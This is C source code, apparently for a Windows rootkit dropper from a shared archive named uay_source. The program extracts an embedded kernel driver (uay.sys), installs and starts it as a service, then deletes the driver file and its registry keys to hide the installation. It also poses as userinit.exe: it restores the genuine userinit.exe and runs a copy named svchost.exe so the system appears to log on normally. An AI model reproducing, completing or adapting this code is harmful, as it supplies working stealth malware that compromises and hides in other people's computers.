www.pudn.com > uay_source.rar > u_userinit.c
#include
#include
#include
#include
int ReleAseTheSys(void);
int LoAdSys(void);
int DeleteSysKey(void);
int
ReleAseTheUserinit(
char* ReleAseWhere //like "C:\\WINDOWS\\System32\\temp_userinit.exe"
);
int
RunUserinitThenDeleteIt(
char* where //like "C:\\WINDOWS\\System32\\temp_userinit.exe"
//must be the sAme As ReleAseTheUserinit's
);
struct _MODIFY_DATA{
unsigned int finder;
unsigned int file_length;
}modify_dAtA = {0x12345678,0};//modified by Another exe,when finded 0x12345678
int WINAPI
WinMain(
HINSTANCE hInstAnce, // handle to current instance
HINSTANCE hPrevInstAnce, // handle to previous instance
LPSTR lpCmdLine, // pointer to command line
int nCmdShow // show state of window
)
{
char syspAth[MAX_PATH+1];
char userinitpAth[MAX_PATH+1];
//驱动部分
ReleAseTheSys();
LoAdSys();
//delete the sys,reg.
GetSystemDirectory(syspAth,MAX_PATH);
strcat(syspAth,"\\uay.sys");
DeleteFile(syspAth);
printf("DeleteFile: %d\n",GetLastError());
DeleteSysKey();
//userinit.exe部分
GetWindowsDirectory(userinitpAth,MAX_PATH);
strcat(userinitpAth,"\\svchost.exe");
ReleAseTheUserinit(userinitpAth);
RunUserinitThenDeleteIt(userinitpAth);
return 0;
}
//--------------------------------------------------------------------
int ReleAseTheSys(void)
{
HRSRC hRes = NULL;
DWORD dwResSize = 0;
HGLOBAL hResource = NULL;
LPVOID lpfResource = NULL;
HANDLE hFile = NULL;
char SystemDir[128];//i think it's enough
DWORD dwWritten;
DWORD result;
hRes = FindResource(NULL,"uay","sys");
if (hRes == NULL) {
return -1;
}
dwResSize = SizeofResource(NULL,hRes);
if (dwResSize == 0) {
return -1;
}
hResource = LoadResource(NULL,hRes);
if (hResource == NULL){
return -1;
}
lpfResource = LockResource(hResource);
if (lpfResource == NULL) {
return -1;
}
GetSystemDirectory(SystemDir,128);
strcat(SystemDir,"\\uay.sys");
hFile = CreateFile(SystemDir,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,NULL);
if (hFile == NULL){
return -1;
}
result = WriteFile(hFile,lpfResource,dwResSize,&dwWritten,NULL);
if (result == 0){
return -1;
}
CloseHandle(hFile);
return 0;
}
//--------------------------------------------------------------------
int LoAdSys(void)
{
//创建服务,加载驱动
SC_HANDLE hSCHAndle;
SC_HANDLE hSCMAnAger;
char systemdir[MAX_PATH+1];
char pAth[MAX_PATH+1];
GetSystemDirectory(systemdir,MAX_PATH);
sprintf(pAth,"%s\\%s",systemdir,"uay.sys");
hSCMAnAger = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
//remove old instAnces
hSCHAndle = OpenService(hSCMAnAger,
"uay.sys",
SERVICE_ALL_ACCESS
);
if (hSCHAndle == NULL){
//throw
//return -1;
}
DeleteService(hSCHAndle);
CloseServiceHandle(hSCHAndle);
//ignore success of instAllAtion:it mAy AlreAdy be instAlled
hSCHAndle = CreateService(
hSCMAnAger,
"uay.sys",
"uay.sys",
SERVICE_ALL_ACCESS,
SERVICE_KERNEL_DRIVER,
SERVICE_DEMAND_START,
SERVICE_ERROR_NORMAL,
pAth,
NULL,
NULL,
NULL,
NULL,
NULL
);
if (hSCHAndle == NULL){
printf("CreAteService error: %d\n",GetLastError());
//return -1;
}
CloseServiceHandle(hSCHAndle);
//ignore success of stArt: it mAy ALreAdy be stAarted
hSCHAndle = OpenService(hSCMAnAger,
"uay.sys",
SERVICE_ALL_ACCESS
);
if (hSCHAndle == NULL){
printf("OpenService error: %d\n",GetLastError());
//return -1;
}
StartService(hSCHAndle,0,NULL);
printf("stArtService %d\n",GetLastError());
CloseServiceHandle(hSCHAndle);
CloseServiceHandle(hSCMAnAger);
return 0;
}
//--------------------------------------------------------------------
int
ReleAseTheUserinit(
char* ReleAseWhere //like "C:\\WINDOWS\\System32\\temp_userinit.exe"
)
{
FILE* pMyself = NULL;
FILE* pUserinit = NULL;
char* buff;
DWORD length;
struct _stat ST;
char pAth_userinit[MAX_PATH+1];
GetSystemDirectory(pAth_userinit,MAX_PATH);
strcat(pAth_userinit,"\\userinit.exe");
_stat(pAth_userinit,&ST);
pMyself = fopen(pAth_userinit,"rb");
if(pMyself == NULL){
printf("open file fAiled\n");
return -1;
}
pUserinit = fopen(ReleAseWhere,"wb");
if(pUserinit == NULL){
printf("creAte file fAiled\n");
return -1;
}
fseek(pMyself,modify_dAtA.file_length,SEEK_SET);
length = ST.st_size - modify_dAtA.file_length ;
printf("length: %d\n",length);///debug
buff = malloc(length);
fread(buff,length,1,pMyself);
fwrite(buff,length,1,pUserinit);
free(buff);
fclose(pMyself);
fclose(pUserinit);
return 0;
}
//--------------------------------------------------------------------
int
RunUserinitThenDeleteIt(
char* where //like "C:\\WINDOWS\\System32\\temp_userinit.exe"
//must be the sAme As ReleAseTheUserinit's
)
{
PROCESS_INFORMATION pi={0};
STARTUPINFO si={sizeof(STARTUPINFO)};
CreateProcess(
where,//"C:\\WINDOWS\\System32\\temp_userinit.exe",
NULL,
NULL,
NULL,
FALSE,
0,
NULL,
NULL,
&si,
&pi
);
//printf("CreAteProcess: %d\n",GetLastError());
WaitForSingleObject(
pi.hProcess,
INFINITE
);
DeleteFile(where);
return 0;
}
//--------------------------------------------------------------------
int DeleteSysKey(void)
{
RegDeleteKey(
HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services\\uay.sys\\Enum"
);
printf("RegDeleteKey: %d\n",GetLastError());
RegDeleteKey(
HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services\\uay.sys\\Security"
);
printf("RegDeleteKey: %d\n",GetLastError());
RegDeleteKey(
HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services\\uay.sys"
);
printf("RegDeleteKey: %d\n",GetLastError());
return 0;
}
//--------------------------------------------------------------------